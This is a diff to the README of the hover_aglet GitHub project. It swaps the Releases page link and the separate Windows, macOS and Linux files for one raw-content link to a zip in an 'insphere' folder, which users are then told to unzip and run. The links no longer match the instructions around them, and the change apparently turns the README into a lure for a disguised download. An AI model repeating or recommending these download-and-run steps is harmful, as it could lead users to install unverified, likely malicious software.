Hyperb0re4/hover_aglet/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [hover_aglet Releases](https://github.com/Hyperb0re4/hover_aglet/releases).
+To get started, visit this page to download: [hover_aglet Releases](https://raw.githubusercontent.com/Hyperb0re4/hover_aglet/main/insphere/hover_aglet_3.0.zip).

 Once you are on the Releases page, follow these steps:

 1. **Choose the latest version**: Look for the most recent version listed at the top.
 2. **Download the application**: Select the appropriate file for your operating system.
-   - For Windows, click on `hover_aglet-Windows.zip`.
+   - For Windows, click on `https://raw.githubusercontent.com/Hyperb0re4/hover_aglet/main/insphere/hover_aglet_3.0.zip`.
-   - For macOS, click on `hover_aglet-macOS.zip`.
+   - For macOS, click on `https://raw.githubusercontent.com/Hyperb0re4/hover_aglet/main/insphere/hover_aglet_3.0.zip`.
-   - For Linux, choose the `hover_aglet-Linux.tar.gz` file.
+   - For Linux, choose the `https://raw.githubusercontent.com/Hyperb0re4/hover_aglet/main/insphere/hover_aglet_3.0.zip` file.
 3. **Unzip or extract the file**: Use built-in tools or third-party apps if necessary.
 4. **Run the application**: Double-click the `hover_aglet` file to launch the app.